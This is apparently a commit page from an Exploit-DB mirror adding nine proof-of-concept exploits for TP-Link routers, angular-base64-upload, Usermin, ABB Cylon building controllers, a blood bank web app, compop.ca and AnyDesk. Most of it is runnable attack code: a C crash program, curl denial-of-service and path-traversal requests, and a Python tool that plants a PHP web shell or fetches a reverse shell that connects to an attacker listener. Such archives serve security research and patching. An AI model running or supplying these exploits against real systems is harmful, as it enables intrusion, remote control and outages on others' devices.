bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-04-18

Browse source 
10 changes to exploits/shellcodes/ghdb

TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)

Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)

Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation

compop.ca 3.5.3 - Arbitrary code Execution

Usermin 2.100 - Username Enumeration

ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution

ABB Cylon Aspect 3.08.02 (ethernetUpdate.php)  - Authenticated Path Traversal

AnyDesk 9.0.1 - Unquoted Service Path
This commit is contained in:
Exploit-DB 2025-04-18 00:16:31 +00:00
parent 7ebfc36557
commit 9ddf81331a
10 changed files with 849 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

248
exploits/multiple/remote/52249.c Normal file
View file

@ -0,0 +1,248 @@
* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
* Date: 11/24/2024
* Exploit Author: Mohamed Maatallah
* Vendor Homepage: https://www.tp-link.com
* Version: TT_V6.2.1021 (VN020-F3v(T))
* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
* CVE: CVE-2024-12344
* Category: Remote
* Description:
* A critical buffer overflow and memory corruption vulnerability was discovered in TP-Link VN020-F3v(T) router's FTP server implementation. The vulnerability stems from improper input validation of the USER command, allowing unauthenticated attackers to trigger various failure modes through payload size manipulation:
* 1. 1100 bytes - Delayed crash (5-10 seconds)
* 2. 1450 bytes - Immediate crash
* 3. >1450 bytes - Undefined behavior/state corruption
* Proof of Concept: (attached full c file)
* Compilation Instructions (Visual Studio):
* ---------------------------------------
* 1. Open Visual Studio
* 2. Create a new C Console Application
* 3. Add these additional dependencies to project settings:
* - ws2_32.lib
* - iphlpapi.lib
* 4. Ensure Windows SDK is installed
* 5. Set Platform Toolset to latest v143 or v142
* 6. Compile in Release or Debug mode
*
* Disclaimer:
* ----------
* This proof of concept is for educational and research purposes only.
* Unauthorized testing without explicit permission is unethical and illegal.
*/
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdint.h>
#include <windows.h>
#include <iphlpapi.h>
#include <icmpapi.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "iphlpapi.lib")
// Target configuration - MODIFY BEFORE TESTING
#define DEST_IP "192.168.1.1" // IP of target FTP server
#define DEST_PORT 21 // Standard FTP port
#define PING_TIMEOUT_MS 1000 // Network timeout
#define MAX_PING_RETRIES 5 // Connectivity check attempts
// 1450: Instant
// 1100: Delayed
#define CRASH_STRING_LENGTH 1450 // Exact number of 'A's triggering instantcrash
#define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2) // USER + As + \r\n
typedef struct {
HANDLE icmp_handle;
IPAddr target_addr;
LPVOID reply_buffer;
DWORD reply_size;
} ping_context_t;
void log_msg(const char* prefix, const char* msg) {
SYSTEMTIME st;
GetLocalTime(&st);
printf("[%02d:%02d:%02d] %s %s\n", st.wHour, st.wMinute, st.wSecond, prefix, msg);
}
void hexdump(const char* desc, const void* addr, const int len) {
int i;
unsigned char buff[17];
const unsigned char* pc = (const unsigned char*)addr;
if (desc != NULL)
printf("%s:\n", desc);
for (i = 0; i < len; i++) {
if ((i % 16) == 0) {
if (i != 0)
printf(" %s\n", buff);
printf(" %04x ", i);
}
printf(" %02x", pc[i]);
if ((pc[i] < 0x20) || (pc[i] > 0x7e))
buff[i % 16] = '.';
else
buff[i % 16] = pc[i];
buff[(i % 16) + 1] = '\0';
}
while ((i % 16) != 0) {
printf(" ");
i++;
}
printf(" %s\n", buff);
}
BOOL check_connectivity(ping_context_t* ctx) {
char send_buf[32] = { 0 };
return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf),
NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0;
}
char* generate_exact_crash_payload() {
char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1); // +1 for null terminator
if (!payload) {
log_msg("[-]", "Failed to allocate payload memory");
return NULL;
}
// Construct the exact payload that causes crash
strcpy(payload, "USER "); // 5 bytes
memset(payload + 5, 'A', CRASH_STRING_LENGTH); // 1450 'A's
memcpy(payload + 5 + CRASH_STRING_LENGTH, "\r\n", 2); // 2 bytes
payload[TOTAL_PAYLOAD_LENGTH] = '\0';
char debug_msg[100];
snprintf(debug_msg, sizeof(debug_msg), "Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)",
TOTAL_PAYLOAD_LENGTH);
log_msg("[*]", debug_msg);
return payload;
}
BOOL send_crash_payload(const char* target_ip, uint16_t target_port) {
WSADATA wsa;
SOCKET sock = INVALID_SOCKET;
struct sockaddr_in server;
char server_reply[2048];
int recv_size;
ping_context_t ping_ctx = { 0 };
BOOL success = FALSE;
// Initialize Winsock
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
log_msg("[-]", "Winsock initialization failed");
return FALSE;
}
// Setup ICMP for connectivity monitoring
ping_ctx.icmp_handle = IcmpCreateFile();
ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32;
ping_ctx.reply_buffer = malloc(ping_ctx.reply_size);
inet_pton(AF_INET, target_ip, &ping_ctx.target_addr);
// Create socket
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == INVALID_SOCKET) {
log_msg("[-]", "Socket creation failed");
goto cleanup;
}
// Setup server address
server.sin_family = AF_INET;
server.sin_port = htons(target_port);
inet_pton(AF_INET, target_ip, &server.sin_addr);
// Connect to FTP server
log_msg("[*]", "Connecting to target FTP server...");
if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
log_msg("[-]", "Connection failed");
goto cleanup;
}
log_msg("[+]", "Connected successfully");
// Verify initial connectivity
if (!check_connectivity(&ping_ctx)) {
log_msg("[-]", "No initial connectivity to target");
goto cleanup;
}
// Receive banner
if ((recv_size = recv(sock, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR) {
log_msg("[-]", "Failed to receive banner");
goto cleanup;
}
server_reply[recv_size] = '\0';
log_msg("[*]", server_reply);
// Generate and send the exact crash payload
char* payload = generate_exact_crash_payload();
if (!payload) {
goto cleanup;
}
log_msg("[*]", "Sending crash payload...");
hexdump("Payload hex dump (first 32 bytes)", payload, 32);
if (send(sock, payload, TOTAL_PAYLOAD_LENGTH, 0) < 0) {
log_msg("[-]", "Failed to send payload");
free(payload);
goto cleanup;
}
free(payload);
log_msg("[+]", "Payload sent successfully");
// Monitor for crash
log_msg("[*]", "Monitoring target status...");
Sleep(1000); // Wait a bit for crash to take effect
int failed_pings = 0;
for (int i = 0; i < MAX_PING_RETRIES; i++) {
if (!check_connectivity(&ping_ctx)) {
failed_pings++;
if (failed_pings >= 3) {
log_msg("[+]", "Target crash confirmed!");
success = TRUE;
goto cleanup;
}
}
Sleep(500);
}
log_msg("[-]", "Target appears to still be responsive");
cleanup:
if (sock != INVALID_SOCKET) {
closesocket(sock);
}
if (ping_ctx.icmp_handle != INVALID_HANDLE_VALUE) {
IcmpCloseHandle(ping_ctx.icmp_handle);
}
if (ping_ctx.reply_buffer) {
free(ping_ctx.reply_buffer);
}
WSACleanup();
return success;
}
int main(void) {
printf("\nTP-Link VN020 FTP Memory Corruption PoC\n");
printf("---------------------------------------\n");
printf("Target: %s:%d\n", DEST_IP, DEST_PORT);
if (send_crash_payload(DEST_IP, DEST_PORT)) {
printf("\nExploit successful - target crashed\n");
}
else {
printf("\nExploit failed - target may be patched\n");
}
return 0;
}

43
exploits/multiple/remote/52250.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342
Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.
Proof of Concept 1 (Missing Parameters DoS):
curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:AddPortMapping>
<NewPortMappingDescription>hello</NewPortMappingDescription>
</u:AddPortMapping></s:Body></s:Envelope>'
Proof of Concept 2 (Memory Corruption):
curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:SetConnectionType
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewConnectionType>'"$(perl -e 'print "%x" x
10000;')"'</NewConnectionType>
</u:SetConnectionType>
</s:Body>
</s:Envelope>'

180
exploits/multiple/webapps/52253.py Executable file
View file

@ -0,0 +1,180 @@
# Exploit Title: Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)
# Date: 10 October 2024
# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
# Software Link: https://github.com/adonespitogo/angular-base64-upload
# Version: prior to v0.1.21
# Tested on: Arch Linux
# CVE : CVE-2024-42640
# Severity: Critical - 10.0 (CVSS 4.0)
# Github Link : https://github.com/rvizx/CVE-2024-42640
# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
import re
import subprocess
import requests
import sys
import os
import uuid
import base64
import cmd
from urllib.parse import urlparse
def banner():
print('''
\033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
\033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
https://github.com/rvizx/\033[0mCVE-2024-42640
''')
def check_version(target):
response = requests.get(target)
first_line = response.text.splitlines()[0].strip()
match = re.search(r'v0\.(1|0)\.(\d+)', first_line)
if match:
version = match.group(0)
x_value = int(match.group(1))
if x_value <= 20:
print(f"\033[94m[inf]:\033[0m target is using a vulnerable version. [version]: {version}")
else:
print(f"\033[91m[err]:\033[0m target is not vulnerable [version]: {version}")
exit()
else:
print("\033[91m[err]:\033[0m couldn't find the version")
def enum(url):
print("\033[94m[inf]:\033[0m enumerating... ")
target = f"{url}/bower_components/angular-base64-upload/dist/angular-base64-upload.min.js"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using bower_components")
check_version(target)
else:
print("\033[94m[inf]:\033[0m target is not using bower_components")
target = f"{url}/node_modules/angular-base64-upload/dist/angular-base64-upload.min.js"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using node_modules")
check_version(target)
else:
print("\033[94m[inf]:\033[0m target is not using node_modules")
print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for dist/angular-base64-upload.min.js")
print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
print("\033[91m[err]:\033[0m exiting..")
exit()
exploit(target)
class CmdShell(cmd.Cmd):
username = subprocess.check_output("whoami", shell=True).strip().decode()
domain = urlparse(sys.argv[1]).netloc
prompt = f"{username}@{domain} > "
def __init__(self, payload_url):
super().__init__()
self.payload_url = payload_url
def default(self, line):
url = f"{self.payload_url}?cmd={line}"
try:
response = requests.get(url)
print(response.text)
except requests.RequestException as e:
print("\033[91m[err]:\033[0m {e}")
def do_exit(self, arg):
return True
def exploit(target):
print(f"[dbg]: {target}")
target_server_url = target.replace("dist/angular-base64-upload.min.js","demo/server.php")
print(f"[dbg]: {target_server_url}")
payload_name = str(uuid.uuid4())+".php"
if len(sys.argv) > 2:
if sys.argv[2] == "--rev":
revshell = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
port = input("\033[93m[ins]:\033[0m enter listenter port: ")
print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
input("\033[93m[ins]:\033[0m press enter to continue...")
print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
response = requests.get(revshell)
if response.status_code == 200:
payload = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
with open(payload_name, "w") as file:
file.write(payload)
payload_url = upload_to_server(payload_name,target_server_url)
print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
r = requests.get(payload_url)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m process complete!")
else:
print("\033[91m[err]:\033[0m something went wrong!")
print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
else:
print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
print("\033[91m[err]:\033[0m exiting..")
exit()
else:
payload = "<?php if($_GET['cmd']) {system($_GET['cmd']);} ?>"
with open(payload_name, "w") as file:
file.write(payload)
payload_url = upload_to_server(payload_name,target_server_url)
cmd_shell = CmdShell(payload_url)
cmd_shell.cmdloop()
def upload_to_server(payload_name,target_server_url):
try:
with open(payload_name, 'rb') as file:
file_content = file.read()
base64_payload = base64.b64encode(file_content).decode('utf-8')
headers = {
'Content-Type': 'application/json',
}
json_data = {
'base64': base64_payload,
'filename': payload_name,
}
response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
updemo_endpoint = f"uploads/{payload_name}"
print(f"[dbg]: {updemo_endpoint}")
payload_url = target_server_url.replace("server.php",updemo_endpoint)
print(f"[dbg]: {payload_url}")
if response.status_code == 200:
print(f"\033[94m[inf]:\033[0m payload is uploaded to {payload_url}")
return payload_url
else:
print("\033[91m[err]:\033[0m something went wrong! failed to upload the payload to server")
exit()
except Exception as e:
print(f"\033[91m[err]:\033[0m {e}")
exit()
if __name__ == "__main__":
try:
banner()
if len(sys.argv) > 1:
url = sys.argv[1]
print(f"\033[94m[inf]:\033[0m target: {url}")
enum(url)
else:
print("[usg]: ./exploit.py <target-url>")
print("[usg]: ./exploit.py <target-url> --rev")
exit()
except Exception as e:
print(f"\033[91m[err]:\033[0m {e}")
exit()

54
exploits/multiple/webapps/52254.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
args = parser.parse_args()
if len(sys.argv) != 5:
print("Please provide the -u for URL and -w for the wordlist containing the usernames")
print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
exit()
usernameFile = open(args.wordlist_users, 'r')
dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()
for i in usernameFileIntoList:
newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
if "Failed to change password: The current password is incorrect." in response.text:
print("Possible user found with username: " + i)
if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
print("Application is most likely not vulnerable and are therefore quitting.")
exit() # comment out line 33-35 if you would still like to try username enumeration.

43
exploits/multiple/webapps/52256.txt Normal file
View file

@ -0,0 +1,43 @@
#Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper
Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955
## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
functionalities such as logout. An attacker can craft a malicious iframe
embedding the logout URL and trick a victim into clicking it. This results
in the victim being logged out without their consent.
## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:
```html
<html>
<body>
<iframe
src="http://localhost/bbdms/logout.php"
style="border:0px #FFFFFF none;"
name="myLogoutFrame"
scrolling="no"
frameborder="1"
marginheight="0px"
marginwidth="0px"
height="400px"
width="600px"
allowfullscreen>
</iframe>
</body>
</html>
4. Save the above HTML code as logout_poc.html.
5.Open the file in a browser and click anywhere on the page to trigger the
logout.

26
exploits/multiple/webapps/52257.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: compop.ca 3.5.3 - Arbitrary code Execution
# Google Dork: Terms of Use inurl:compop.vip
# Date: 22/12/2024
# Exploit Author: dmlino
# Vendor Homepage: https://www.compop.ca/
# Version: 3.5.3
# CVE : CVE-2024-48445
The restaurant management system implements authentication using a Unix
timestamp parameter ("ts") in the URL. This implementation is vulnerable to
manipulation as it relies solely on time-based validation without proper
authentication mechanisms.
Technical Details:
The application uses a URL parameter "ts" which accepts a Unix timestamp
value.
Steps:
1. Find a vulnerable restaurant.
2. Get the current time in the UNIX format:
Linux: $date +%s
Windows Powershell: [int](Get-Date -UFormat %s -Millisecond 0)
3. Replace parameter in url with the new value

79
exploits/php/hardware/52251.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: ABB Cylon Aspect 3.08.02 (deployStart.php) Unauthenticated Command Execution
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
shell command execution vulnerability through the deployStart.php script.
This allows any user to trigger the execution of 'rundeploy.sh' script, which
initializes the Java deployment server that sets various configurations,
potentially causing unauthorized server initialization and performance issues.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5891
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5891.php
CVE ID: CVE-2024-48840
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48840
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/deployStart.php

135
exploits/php/hardware/52252.txt Normal file
View file

@ -0,0 +1,135 @@
# Exploit Title: ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon controller suffers from an authenticated path traversal
vulnerability. This can be exploited through the 'devName' POST parameter in
the ethernetUpdate.php script to write partially controlled content, such as
IP address values, into arbitrary file paths, potentially leading to configuration
tampering and system compromise including denial of service scenario through
ethernet configuration backup file overwrite.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5890
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5890.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/ethernetUpdate.php \
> -d "listFile=%2Fusr%2Flocal%2Faam%2Fetc%2Feth0\
> &devName=../../../../../../../home/MIX_CMIX/htmlroot/testingus\
> &useDHCP=1\
> &dhcp=YES\
> &IP1=192&IP2=168&IP3=73&IP4=31\
> &SM1=255&SM2=255&SM3=255&SM4=0\
> &N1=192&N2=168&N3=1&N4=0\
> &B1=192&B2=168&B3=1&B4=255\
> &GW1=192&GW2=168&GW3=1&GW4=254\
> &DNSA1=&DNSA2=&DNSA3=&DNSA4=\
> &DNSB1=&DNSB2=&DNSB3=&DNSB4=\
> &submitTime=Submit" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
<title>Web Server Configuration</title>
<link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>
<body class="workscroll" topmargin="0" leftmargin="0" scroll="No">
<h1>Ethernet Settings</h1>
<p class="subtitle">
Ethernet settings have been successfully updated.<br>Please supply MAC address below to your Network Administrator in order to determine new IP Address.<br><b>MAC Address: </b></p>
<iframe src="ethernetUpdateRun.php" style="visibility:hidden;"/>
</form>
<hr>
</body>
</html>
$ curl http://192.168.73.31/testingus.bak
ONBOOT=yes
DHCP=YES
IPADDR=192.168.73.31
NETMASK=255.255.255.0
GATEWAY=192.168.1.254
NETWORK=192.168.1.0
BROADCAST=192.168.1.255
DNS1=
DNS2=
$ cat -n /home/MIX_CMIX/htmlroot/ethernetUpdateRun.php
1 <?php
2 //---------Begin Authorization-------------
3 require_once 'validate/validateHeader.php';
4 //--------End Authorization----------------
5 include "lib/configParameter.php";
6 $lookupLog = "config/configfile";
7 $listFile = trim(obtainValue($lookupLog, "SHELL"));
8 $command = $listFile . "net.sh";
9 $sudo = trim(obtainValue($lookupLog, "SUDO"));
10 logWarning("Ethernet Settings modified");
11 exec($sudo . " " . $listFile . "net.sh");
12 exit();
13
14 ?>

32
exploits/windows/local/52258.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: AnyDesk 9.0.1 - Unquoted Service Path
# Date: 2024-12-11
# Exploit Author: Parastou Razi
# Contact: razi.parastoo@gmail.com
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 9.0.1
# Tested on: Windows 11 x64
1. Description:
The Anydesk installs as a service with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc anydesk --service
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: anydesk
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
--service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AnyDesk Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem

9
files_exploits.csv
View file

@ -11592,6 +11592,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
